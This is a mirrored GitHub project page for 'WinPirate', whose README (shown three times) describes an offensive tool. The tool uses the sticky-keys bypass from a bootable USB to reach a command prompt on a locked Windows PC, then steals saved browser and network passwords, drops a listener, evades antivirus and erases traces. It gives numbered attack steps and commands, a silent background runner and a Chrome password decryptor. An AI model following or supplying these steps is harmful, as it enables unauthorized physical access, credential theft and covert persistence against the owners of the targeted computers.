Giters

82goober82 / winpirate

to grab or steal the password of systemAutomated sticky keys hack. Post exploitation it grabs browser passwords, history, and network passwords Download git clone https://github.com/pourquoibenoit/WinPirate.git This project is still in progress Estimated Completion Date: soon…ish Here’s the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there. All without being detected by antivirus we should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely How to Use Requirements: a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory) chromepasswords.py requires PyWin32 If the computer is locked: 1) shutdown windows (make sure not hibernating by holding shift while pressing shut down) 2) hit F12 and select USB 3) sudo -i 4) fdisk -l (note: if you’re on Kali Linux, run parted -l) 5) mkdir /media/windows 6) mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs 7) run Stickykeys.sh 8) restart and boot to Windows 9) hit Shift 5 times fast, a command prompt will appear 10) cd to the USB and run WinPirate.bat If the computer isn’t locked: cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds Current Issues 1) The chrome passwords grabber that I made is still a .py For it to work, I need to convert it to exe so it doesn’t require python to be installed on the system. You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV 2) The sticky keys automation doesn’t speed the process up as much as I previously thought, as evident by the lengthy “How to Use” section 3) I haven’t been able to write any tools that grab passwords for IE or Firefox Source: https://github.com/pourquoibenoit/WinPirate

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

#This project is still in progress

Estimated Completion Date: soon...ish

Here's the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB.

Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.

All without being detected by antivirus

we should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely

#How to Use Requirements: a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)

chromepasswords.py requires PyWin32

If the computer is locked:

  1. shutdown windows (make sure not hibernating by holding shift while pressing shut down)
  2. hit F12 and select USB
  3. sudo -i
  4. fdisk -l (note: if you're on Kali Linux, run parted -l)
  5. mkdir /media/windows
  6. mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
  7. run Stickykeys.sh
  8. restart and boot to Windows
  9. hit Shift 5 times fast, a command prompt will appear
  10. cd to the USB and run WinPirate.bat

If the computer isn't locked:
cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds

#Current Issues

  1. The chrome passwords grabber that I made is still a .py For it to work, I need to convert it to exe so it doesn't require python to be installed on the system.
    You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV

  2. The sticky keys automation doesn't speed the process up as much as I previously thought, as evident by the lengthy "How to Use" section

  3. I haven't been able to write any tools that grab passwords for IE or Firefox

About

to grab or steal the password of systemAutomated sticky keys hack. Post exploitation it grabs browser passwords, history, and network passwords Download git clone https://github.com/pourquoibenoit/WinPirate.git This project is still in progress Estimated Completion Date: soon…ish Here’s the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there. All without being detected by antivirus we should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely How to Use Requirements: a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory) chromepasswords.py requires PyWin32 If the computer is locked: 1) shutdown windows (make sure not hibernating by holding shift while pressing shut down) 2) hit F12 and select USB 3) sudo -i 4) fdisk -l (note: if you’re on Kali Linux, run parted -l) 5) mkdir /media/windows 6) mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs 7) run Stickykeys.sh 8) restart and boot to Windows 9) hit Shift 5 times fast, a command prompt will appear 10) cd to the USB and run WinPirate.bat If the computer isn’t locked: cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds Current Issues 1) The chrome passwords grabber that I made is still a .py For it to work, I need to convert it to exe so it doesn’t require python to be installed on the system. You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV 2) The sticky keys automation doesn’t speed the process up as much as I previously thought, as evident by the lengthy “How to Use” section 3) I haven’t been able to write any tools that grab passwords for IE or Firefox Source: https://github.com/pourquoibenoit/WinPirate

Languages

Language:PowerShell 83.9%Language:Python 8.8%Language:Batchfile 5.9%Language:Shell 1.0%Language:Visual Basic 0.3%